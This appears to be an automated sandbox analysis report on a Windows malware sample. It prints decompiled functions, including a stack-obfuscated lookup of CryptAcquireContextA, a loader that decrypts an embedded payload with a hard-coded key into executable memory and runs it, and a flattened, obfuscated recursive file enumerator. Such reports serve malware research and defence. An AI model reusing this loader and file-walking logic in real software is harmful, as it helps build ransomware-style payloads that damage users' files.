                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                      • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                      • API String ID: 434808117-483790700
                                                      • Opcode ID: f08d9e5c1f063fad43e3bac39308fc273327a62577f739e3d1c5777cca01ddae
                                                      • Instruction ID: 73e1e2af98abfcea5160a2e7c85213876d0caf47e62fbe05c0c2028d5027c9cb
                                                      • Opcode Fuzzy Hash: f08d9e5c1f063fad43e3bac39308fc273327a62577f739e3d1c5777cca01ddae
                                                      • Instruction Fuzzy Hash: A1814CB1E002199BCB10DFA5DC45AFEBBB8EB98304F10052BF955F3280DB789A45CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 44 401d20-401dfb call 401cc0 LoadLibraryW GetProcAddress 48 401e01-401e12 44->48 49 401dfd-401dff 44->49 52 401e14-401e16 48->52 53 401e18 48->53 50 401e1d-401e20 49->50 52->50 53->50
                                                      C-Code - Quality: 33%
                                                      			E00401D20(void* __eflags) {
                                                      				_Unknown_base(*)()* _v8;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				intOrPtr _v40;
                                                      				intOrPtr _v44;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v52;
                                                      				intOrPtr _v56;
                                                      				intOrPtr _v60;
                                                      				intOrPtr _v64;
                                                      				intOrPtr _v68;
                                                      				intOrPtr _v72;
                                                      				intOrPtr _v76;
                                                      				intOrPtr _v80;
                                                      				intOrPtr _v84;
                                                      				intOrPtr _v88;
                                                      				char _v92;
                                                      				char _v96;
                                                      				CHAR* _v100;
                                                      				void* _t37;
                                                      
                                                      				_v92 = 0x43;
                                                      				_v88 = 0x72;
                                                      				_v84 = 0x79;
                                                      				_v80 = 0x70;
                                                      				_v76 = 0x74;
                                                      				_v72 = 0x41;
                                                      				_v68 = 0x63;
                                                      				_v64 = 0x71;
                                                      				_v60 = 0x75;
                                                      				_v56 = 0x69;
                                                      				_v52 = 0x72;
                                                      				_v48 = 0x65;
                                                      				_v44 = 0x43;
                                                      				_v40 = 0x6f;
                                                      				_v36 = 0x6e;
                                                      				_v32 = 0x74;
                                                      				_v28 = 0x65;
                                                      				_v24 = 0x78;
                                                      				_v20 = 0x74;
                                                      				_v16 = 0x41;
                                                      				_t21 =  &_v92; // 0x43
                                                      				_v100 = E00401CC0(__eflags, _t21, 0x14);
                                                      				_v8 = 0;
                                                      				_v8 = GetProcAddress(LoadLibraryW(L"ADVAPI32.DLL"), _v100);
                                                      				_v96 = 0;
                                                      				_push(0);
                                                      				_push(1);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push( &_v96); // executed
                                                      				if(_v8() != 0) {
                                                      					_t37 = _v8( &_v96, 0, 0, 1, 8);
                                                      					__eflags = _t37;
                                                      					if(_t37 != 0) {
                                                      						return 1;
                                                      					}
                                                      					return 0;
                                                      				}
                                                      				return 0;
                                                      			}




























                                                      APIs
                                                        • Part of subcall function 00401CC0: _malloc.LIBCMT ref: 00401CCA
                                                      • LoadLibraryW.KERNEL32(ADVAPI32.DLL,?), ref: 00401DD3
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401DDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc_malloc
                                                      • String ID: A$A$ADVAPI32.DLL$C$CryptAcquireContextA$c$e$e$i$n$o$q$r$t$t$u$x
                                                      • API String ID: 2391205483-810849556
                                                      • Opcode ID: 33be6887776bb45f156c91100feadfee9feefed4932a3788c4d42c489fbfde11
                                                      • Instruction ID: 83cb7c6687cd2237a667902df97d767b3d8751ad43d865d9c8d3f020bb7d5c88
                                                      • Opcode Fuzzy Hash: 33be6887776bb45f156c91100feadfee9feefed4932a3788c4d42c489fbfde11
                                                      • Instruction Fuzzy Hash: A521B6B0D44308EAEB10CFD0D8497DEBBB5BB04748F104119E5087A2D0D7FE6A588F94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      [Control-flow graph 98, entry block 2241030-2241075. API calls shown in the graph: LoadLibraryW, GetProcAddress, SetLastError, GetNativeSystemInfo, GetProcessHeap, RtlAllocateHeap, GetPEB]
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(02244054,02244040), ref: 02241047
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0224104E
                                                        • Part of subcall function 02241B30: SetLastError.KERNEL32(0000000D,?,02241070,?,00000040), ref: 02241B3D
                                                      • SetLastError.KERNEL32(000000C1), ref: 02241096
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$AddressLibraryLoadProc
                                                      • String ID:
                                                      • API String ID: 1866314245-0
                                                      • Opcode ID: 9f29b4545a87d577bf6f958e6fa2cf3ea53f28b8c310e4b8721525c519dd5adc
                                                      • Instruction ID: 4860a13a9ea067abdc4836b8e06aed3e29d8dff52a7e10b05706b815c7dd6f6f
                                                      • Opcode Fuzzy Hash: 9f29b4545a87d577bf6f958e6fa2cf3ea53f28b8c310e4b8721525c519dd5adc
                                                      • Instruction Fuzzy Hash: 44F1C9B4E10209EFDB08CF94D984BADB7B1AF48304F208598E919AB345DB75EA91CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E0040638F(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed int _t54;
                                                      				void* _t58;
                                                      				signed int _t59;
                                                      				signed int _t63;
                                                      				signed short _t71;
                                                      				signed int _t84;
                                                      				void* _t94;
                                                      				struct HINSTANCE__* _t96;
                                                      				signed int _t97;
                                                      				void* _t98;
                                                      				signed int _t100;
                                                      				void* _t101;
                                                      				void* _t102;
                                                      
                                                      				_t102 = __eflags;
                                                      				_t94 = __edx;
                                                      				_push(0x24);
                                                      				E0041F71D(E00431E39, __ebx, __edi, __esi);
                                                      				_t100 = __ecx;
                                                      				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
                                                      				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
                                                      				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
                                                      				_t54 = E0040DB94(__ebx, __edi, __ecx, _t102);
                                                      				_t96 =  *(_t54 + 0xc);
                                                      				_t84 = 0;
                                                      				_t103 =  *(_t100 + 0x58);
                                                      				if( *(_t100 + 0x58) != 0) {
                                                      					_t96 =  *(E0040DB94(0, _t96, _t100, _t103) + 0xc);
                                                      					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
                                                      					 *(_t101 - 0x18) = _t54;
                                                      				}
                                                      				if( *(_t101 - 0x18) != _t84) {
                                                      					_t54 = LockResource( *(_t101 - 0x18));
                                                      					 *(_t101 - 0x1c) = _t54;
                                                      				}
                                                      				if( *(_t101 - 0x1c) != _t84) {
                                                      					_t86 = _t100;
                                                      					 *(_t101 - 0x14) = E00405EC7(_t84, _t100, __eflags);
                                                      					E00409D3F(_t84, _t96, __eflags);
                                                      					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
                                                      					__eflags =  *(_t101 - 0x14) - _t84;
                                                      					 *(_t101 - 0x2c) = _t84;
                                                      					 *(_t101 - 0x24) = _t84;
                                                      					if(__eflags != 0) {
                                                      						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
                                                      						if(__eflags != 0) {
                                                      							__eflags = IsWindowEnabled( *(_t101 - 0x14));
                                                      							if(__eflags != 0) {
                                                      								EnableWindow( *(_t101 - 0x14), 0);
                                                      								 *(_t101 - 0x2c) = 1;
                                                      								_t84 = E00403ED6();
                                                      								__eflags = _t84;
                                                      								 *(_t101 - 0x24) = _t84;
                                                      								if(__eflags != 0) {
                                                      									_t86 = _t84;
                                                      									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
                                                      									if(__eflags != 0) {
                                                      										_t86 = _t84;
                                                      										__eflags = E0040CA70(_t84);
                                                      										if(__eflags != 0) {
                                                      											_t86 = _t84;
                                                      											E0040CA8B(_t84, 0);
                                                      											 *(_t101 - 0x28) = 1;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
                                                      					E0040B748(_t96, __eflags, _t100);
                                                      					_t58 = E00409C97(_t84, _t86, _t101,  *(_t101 - 0x14));
                                                      					_push(_t96);
                                                      					_push(_t58);
                                                      					_push( *(_t101 - 0x1c));
                                                      					_t59 = E0040619F(_t84, _t100, _t94, _t96, _t100, __eflags); // executed
                                                      					_t97 = 0;
                                                      					__eflags = _t59;
                                                      					if(_t59 != 0) {
                                                      						__eflags =  *(_t100 + 0x3c) & 0x00000010;
                                                      						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
                                                      							_t98 = 4;
                                                      							_t71 = E0040C981(_t100);
                                                      							__eflags = _t71 & 0x00000100;
                                                      							if((_t71 & 0x00000100) != 0) {
                                                      								_t98 = 5;
                                                      							}
                                                      							E0040982D(_t100, _t98);
                                                      							_t97 = 0;
                                                      							__eflags = 0;
                                                      						}
                                                      						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
                                                      						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
                                                      							E0040CC5E(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
                                                      						}
                                                      					}
                                                      					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                      					__eflags =  *(_t101 - 0x28) - _t97;
                                                      					if( *(_t101 - 0x28) != _t97) {
                                                      						E0040CA8B(_t84, 1);
                                                      					}
                                                      					__eflags =  *(_t101 - 0x2c) - _t97;
                                                      					if( *(_t101 - 0x2c) != _t97) {
                                                      						EnableWindow( *(_t101 - 0x14), 1);
                                                      					}
                                                      					__eflags =  *(_t101 - 0x14) - _t97;
                                                      					if(__eflags != 0) {
                                                      						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
                                                      						if(__eflags == 0) {
                                                      							SetActiveWindow( *(_t101 - 0x14));
                                                      						}
                                                      					}
                                                      					 *((intOrPtr*)( *_t100 + 0x60))();
                                                      					E00405F01(_t84, _t100, _t97, _t100, __eflags);
                                                      					__eflags =  *(_t100 + 0x58) - _t97;
                                                      					if( *(_t100 + 0x58) != _t97) {
                                                      						FreeResource( *(_t101 - 0x18));
                                                      					}
                                                      					_t63 =  *(_t100 + 0x44);
                                                      					goto L31;
                                                      				} else {
                                                      					_t63 = _t54 | 0xffffffff;
                                                      					L31:
                                                      					return E0041F7C2(_t63);
                                                      				}
                                                      			}

















                                                      APIs
                                                      • __EH_prolog3_catch.LIBCMT ref: 00406396
                                                      • FindResourceA.KERNEL32(?,?,00000005), ref: 004063C9
                                                      • LoadResource.KERNEL32(?,00000000), ref: 004063D1
                                                      • LockResource.KERNEL32(?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 004063E2
                                                      • GetDesktopWindow.USER32 ref: 00406415
                                                      • IsWindowEnabled.USER32(?), ref: 00406423
                                                      • EnableWindow.USER32(?,00000000), ref: 00406432
                                                        • Part of subcall function 0040CA70: IsWindowEnabled.USER32(?), ref: 0040CA79
                                                        • Part of subcall function 0040CA8B: EnableWindow.USER32(?,?), ref: 0040CA98
                                                      • EnableWindow.USER32(?,00000001), ref: 0040650E
                                                      • GetActiveWindow.USER32 ref: 00406519
                                                      • SetActiveWindow.USER32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406527
                                                      • FreeResource.KERNEL32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406543
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                      • String ID:
                                                      • API String ID: 1509511306-0
                                                      • Opcode ID: bf87a749a78ca6df1642d3bac92c0d685b06468b383742aa02b2d1cc5a8d1e5f
                                                      • Instruction ID: 8608bcd7ad7a3e8128c5f383c3e7d97f5d4ffa180cd5963f6d8b64b71c53f861
                                                      • Opcode Fuzzy Hash: bf87a749a78ca6df1642d3bac92c0d685b06468b383742aa02b2d1cc5a8d1e5f
                                                      • Instruction Fuzzy Hash: 1051AD30A00605DBCB21AFA5C985AAFBBB1BF84705F15413EE502B62D2CB785951CF6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E00403F0B(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, int _a4) {
                                                      				signed int _v8;
                                                      				char _v284;
                                                      				char _v288;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t9;
                                                      				struct HINSTANCE__* _t12;
                                                      				intOrPtr* _t18;
                                                      				intOrPtr _t26;
                                                      				void* _t27;
                                                      				intOrPtr _t33;
                                                      				signed int _t34;
                                                      				intOrPtr _t35;
                                                      				signed int _t36;
                                                      				void* _t37;
                                                      
                                                      				_t33 = __edi;
                                                      				_t32 = __edx;
                                                      				_t28 = __ecx;
                                                      				_t26 = __ebx;
                                                      				_t9 =  *0x443590; // 0xa920217c
                                                      				_v8 = _t9 ^ _t36;
                                                      				_t39 = _a4 - 0x800;
                                                      				_t35 = __ecx;
                                                      				if(_a4 != 0x800) {
                                                      					_t12 = GetLocaleInfoA(_a4, 3,  &_v288, 4); // executed
                                                      					__eflags = _t12;
                                                      					if(__eflags != 0) {
                                                      						goto L2;
                                                      					} else {
                                                      					}
                                                      				} else {
                                                      					_push(E0041FC1E(__edx,  &_v288, 4, "LOC"));
                                                      					E00402F17(__ebx, _t28, __edi, _t35);
                                                      					_t37 = _t37 + 0x10;
                                                      					L2:
                                                      					_push(_t26);
                                                      					_push(_t33);
                                                      					_t34 =  *(E0041F8D2(_t39));
                                                      					 *(E0041F8D2(_t39)) =  *_t14 & 0x00000000;
                                                      					_t35 = 0x112;
                                                      					_t27 = E0041FC9F( &_v284, 0x112, 0x111, 0x112,  &_v288);
                                                      					_t18 = E0041F8D2(_t39);
                                                      					_t40 =  *_t18;
                                                      					if( *_t18 == 0) {
                                                      						 *(E0041F8D2(__eflags)) = _t34;
                                                      					} else {
                                                      						E004031BC( *((intOrPtr*)(E0041F8D2(_t40))));
                                                      					}
                                                      					if(_t27 == 0xffffffff || _t27 >= _t35) {
                                                      						_t12 = 0;
                                                      						__eflags = 0;
                                                      					} else {
                                                      						_t12 = LoadLibraryA( &_v284); // executed
                                                      					}
                                                      					_pop(_t33);
                                                      					_pop(_t26);
                                                      				}
                                                      				return E0041E5DF(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
                                                      			}



















                                                      APIs
                                                      • _strcpy_s.LIBCMT ref: 00403F38
                                                        • Part of subcall function 00402F17: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 00402F17: __EH_prolog3.LIBCMT ref: 00403804
                                                        • Part of subcall function 0041F8D2: __getptd_noexit.LIBCMT ref: 0041F8D2
                                                      • __snprintf_s.LIBCMT ref: 00403F71
                                                        • Part of subcall function 0041FC9F: __vsnprintf_s_l.LIBCMT ref: 0041FCB4
                                                      • GetLocaleInfoA.KERNELBASE(00000800,00000003,?,00000004), ref: 00403F9C
                                                      • LoadLibraryA.KERNELBASE(?), ref: 00403FBF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                      • String ID: LOC
                                                      • API String ID: 4018564869-519433814
                                                      • Opcode ID: 124329ac7b5173beeb4f80da07e0245dcef33f898aea0afbead4e6b8adcc6ca7
                                                      • Instruction ID: a958a6fff790820a8ed6774035e13ca5e81909a58661fe9e0dffe607a1d70840
                                                      • Opcode Fuzzy Hash: 124329ac7b5173beeb4f80da07e0245dcef33f898aea0afbead4e6b8adcc6ca7
                                                      • Instruction Fuzzy Hash: D811A8719102086AD714BF61CC46BDE36BCAF01719F1000B7B504BB1D1EB7C9E9A8B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E022528FB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                      				short _v524;
                                                      				char _v1044;
                                                      				short _v1588;
                                                      				short _v1590;
                                                      				struct _WIN32_FIND_DATAW _v1636;
                                                      				void* _v1640;
                                                      				void* _t21;
                                                      				void* _t22;
                                                      				int _t28;
                                                      				signed int _t31;
                                                      				signed int _t33;
                                                      				signed int _t35;
                                                      				void* _t47;
                                                      				void* _t48;
                                                      				void* _t50;
                                                      				void* _t75;
                                                      				void* _t78;
                                                      				void* _t79;
                                                      
                                                      				_t75 = _v1640;
                                                      				_t48 = __edx;
                                                      				_t78 = __ecx;
                                                      				_t21 = 0xe3051c;
                                                      				while(1) {
                                                      					L1:
                                                      					_t50 = 0x2e;
                                                      					do {
                                                      						L2:
                                                      						while(_t21 != 0xe3051c) {
                                                      							if(_t21 == 0x57934ae) {
                                                      								_t22 = E02252674(0x2259190);
                                                      								_push(_t78);
                                                      								_t76 = _t22;
                                                      								_push(_t22);
                                                      								_push(0x104);
                                                      								_push( &_v524);
                                                      								 *((intOrPtr*)(E02252F84(0xa83808e5, 0xb436274a, 0x156)))();
                                                      								_t79 = _t79 + 0x10;
                                                      								E02252FDF(_t76);
                                                      								_t21 = 0x3a3f7db0;
                                                      								while(1) {
                                                      									L1:
                                                      									_t50 = 0x2e;
                                                      									goto L2;
                                                      								}
                                                      							}
                                                      							if(_t21 == 0xfc52714) {
                                                      								E02252F84(0xf568ce83, 0xdc33dcc3, 0x19d);
                                                      								_t28 = FindClose(_t75); // executed
                                                      								return _t28;
                                                      							}
                                                      							if(_t21 == 0x29ccb448) {
                                                      								E02252F84(0xf568ce83, 0xab7da153, 0x55);
                                                      								_t31 = FindNextFileW(_t75,  &_v1636); // executed
                                                      								asm("sbb eax, eax");
                                                      								_t33 =  ~_t31 & 0x1aaf748c;
                                                      								L19:
                                                      								_t21 = _t33 + 0xfc52714;
                                                      								while(1) {
                                                      									L1:
                                                      									_t50 = 0x2e;
                                                      									goto L2;
                                                      								}
                                                      							}
                                                      							if(_t21 == 0x2a749ba0) {
                                                      								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                      									_t35 = _a4( &_v1636, _a8);
                                                      									asm("sbb eax, eax");
                                                      									_t33 =  ~_t35 & 0x1a078d34;
                                                      									goto L19;
                                                      								}
                                                      								if(_v1636.cFileName != _t50 || _v1590 != 0 && (_v1590 != _t50 || _v1588 != 0)) {
                                                      									if(_t48 != 0) {
                                                      										_t77 = E02252674(0x22591c0);
                                                      										_push( &(_v1636.cFileName));
                                                      										_push(_t78);
                                                      										_push(0x104);
                                                      										_push( &_v1044);
                                                      										 *((intOrPtr*)(E02252F84(0xa83808e5, 0xb436274a, 0x156)))();
                                                      										_t79 = _t79 + 0x14;
                                                      										E022528FB( &_v1044, _t48, _a4, _a8);
                                                      										E02252FDF(_t77);
                                                      										_t50 = 0x2e;
                                                      									}
                                                      								}
                                                      								_t21 = 0x29ccb448;
                                                      								continue;
                                                      							}
                                                      							if(_t21 != 0x3a3f7db0) {
                                                      								goto L23;
                                                      							}
                                                      							E02252F84(0xf568ce83, 0x8da84b58, 0x158);
                                                      							_t47 = FindFirstFileW( &_v524,  &_v1636); // executed
                                                      							_t75 = _t47;
                                                      							if(_t75 == 0xffffffff) {
                                                      								return _t47;
                                                      							}
                                                      							_t21 = 0x2a749ba0;
                                                      							goto L1;
                                                      						}
                                                      						_t21 = 0x57934ae;
                                                      						L23:
                                                      					} while (_t21 != 0x3178f15b);
                                                      					return _t21;
                                                      				}
                                                      			}






















                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 02252975
                                                      • FindNextFileW.KERNELBASE(?,?), ref: 02252A62
                                                      • FindClose.KERNELBASE(?), ref: 02252ADD
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: fe819a75e12c512f8cec9328a153777351e873264154be275a71e7aec3d8dc12
                                                      • Instruction ID: 6b957165d77b51acb338c83fa831de4c81644eb0420573eb58f59db7377d608a
                                                      • Opcode Fuzzy Hash: fe819a75e12c512f8cec9328a153777351e873264154be275a71e7aec3d8dc12
                                                      • Instruction Fuzzy Hash: 44414C31528322D6D638A5E49884B6B66E6CBD0324F24CB19FD50C73D8DF7AC9C4C6A3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 76%
                                                      			E00401E30(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				int _v8;
                                                      				char _v16;
                                                      				intOrPtr _v20;
                                                      				int _v24;
                                                      				char _v28;
                                                      				int _v32;
                                                      				_Unknown_base(*)()* _v36;
                                                      				_Unknown_base(*)()* _v40;
                                                      				intOrPtr _v44;
                                                      				long _v48;
                                                      				struct HINSTANCE__* _v52;
                                                      				void* _v56;
                                                      				intOrPtr _v72;
                                                      				intOrPtr _v100;
                                                      				CHAR* _v104;
                                                      				long _v112;
                                                      				long _v116;
                                                      				intOrPtr _v120;
                                                      				void* __ebp;
                                                      				signed int _t74;
                                                      				void* _t97;
                                                      				signed int _t152;
                                                      				void* _t158;
                                                      				intOrPtr _t161;
                                                      
                                                      				_t158 = __eflags;
                                                      				_push(0xffffffff);
                                                      				_push(E00431B18);
                                                      				_push( *[fs:0x0]);
                                                      				_t74 =  *0x443590; // 0xa920217c
                                                      				_push(_t74 ^ _t152);
                                                      				 *[fs:0x0] =  &_v16;
                                                      				_v120 = __ecx;
                                                      				E00406041(__ebx, _v120, __edi);
                                                      				_push(GetSystemMenu( *(_v120 + 0x20), 0));
                                                      				_v20 = E0040DEED(__ebx,  *(_v120 + 0x20), __edi, __esi, _t158);
                                                      				if(_v20 != 0) {
                                                      					E00402890( &_v28);
                                                      					_v8 = 0;
                                                      					_push(0x68);
                                                      					_v72 = E0040DDFE();
                                                      					if(_v72 != 0) {
                                                      						E00402910( &_v28, _v72, 0x68);
                                                      					}
                                                      					_v100 =  *((intOrPtr*)(_v28 - 0xc));
                                                      					_t161 = _v100;
                                                      					_t162 = _t161 == 0x00000000 & 0x000000ff;
                                                      					if((_t161 == 0x00000000 & 0x000000ff) == 0) {
                                                      						AppendMenuA( *(_v20 + 4), 0x800, 0, 0);
                                                      						_v104 = _v28;
                                                      						AppendMenuA( *(_v20 + 4), 0, 0x10, _v104);
                                                      					}
                                                      					_v32 = 0;
                                                      					_v56 = 0;
                                                      					_v48 = 0;
                                                      					_v40 = 0;
                                                      					_t97 = E00401D20(_t162); // executed
                                                      					_t163 = _t97;
                                                      					if(_t97 == 0) {
                                                      						_v40 = GetProcAddress(0x400000, "UUACZDADWAJJJJJ");
                                                      					}
                                                      					_v52 = E00401A10(L"kernel32.dll");
                                                      					_v36 = GetProcAddress(_v52, "VirtualAlloc");
                                                      					_v32 = E00401A70(_t163, 0x3d9, 0x11c1, 0x409,  &_v48);
                                                      					if(_v32 != 0) {
                                                      						_v56 = VirtualAlloc(0, _v48, 0x3000, 0x40);
                                                      					}
                                                      					if(_v56 != 0) {
                                                      						_v40(_v32, _v48, "6Z6x8!4zpUCX@R#toJr^+TCgAUZ(Q%ylNN>>FTZD_XQd$eGdqe@v?1J48XWg!*)(O9tF@RENQV27J_nbjWhEt%U5@&RL(^C?NZe>&SRx1xAVYzU6ZpO^Q", 0x76, _v56);
                                                      					}
                                                      					_v24 = _v56;
                                                      					_v44 = _v24();
                                                      					_v8 = 0xffffffff;
                                                      					E00401320( &_v28);
                                                      				}
                                                      				_v112 =  *((intOrPtr*)(_v120 + 0x74));
                                                      				SendMessageA( *(_v120 + 0x20), 0x80, 1, _v112);
                                                      				_v116 =  *((intOrPtr*)(_v120 + 0x74));
                                                      				SendMessageA( *(_v120 + 0x20), 0x80, 0, _v116);
                                                      				if( *((intOrPtr*)(_v120 + 0x120)) == 0) {
                                                      					__eflags = _v120 + 0x78;
                                                      					E0040CA8B(_v120 + 0x78, 0);
                                                      				} else {
                                                      					E0040CA8B(_v120 + 0x78, 1);
                                                      				}
                                                      				if( *((intOrPtr*)(_v120 + 0x130)) == 0) {
                                                      					__eflags = _v120 + 0xcc;
                                                      					E0040CA8B(_v120 + 0xcc, 0);
                                                      				} else {
                                                      					E0040CA8B(_v120 + 0xcc, 1);
                                                      				}
                                                      				 *[fs:0x0] = _v16;
                                                      				return 1;
                                                      			}




























                                                      APIs
                                                      • GetSystemMenu.USER32(?,00000000,A920217C), ref: 00401E69
                                                      • AppendMenuA.USER32 ref: 00401EDA
                                                      • AppendMenuA.USER32 ref: 00401EF5
                                                      • GetProcAddress.KERNEL32(00400000,UUACZDADWAJJJJJ), ref: 00401F2A
                                                      • GetProcAddress.KERNEL32(?,VirtualAlloc), ref: 00401F4C
                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00401F86
                                                      • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00401FE1
                                                      • SendMessageA.USER32(?,00000080,00000000,?), ref: 00402002
                                                      Strings
                                                      • UUACZDADWAJJJJJ, xrefs: 00401F20
                                                      • 6Z6x8!4zpUCX@R#toJr^+TCgAUZ(Q%ylNN>>FTZD_XQd$eGdqe@v?1J48XWg!*)(O9tF@RENQV27J_nbjWhEt%U5@&RL(^C?NZe>&SRx1xAVYzU6ZpO^Q, xrefs: 00401F98
                                                      • VirtualAlloc, xrefs: 00401F43
                                                      • kernel32.dll, xrefs: 00401F33
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Menu$AddressAppendMessageProcSend$AllocSystemVirtual
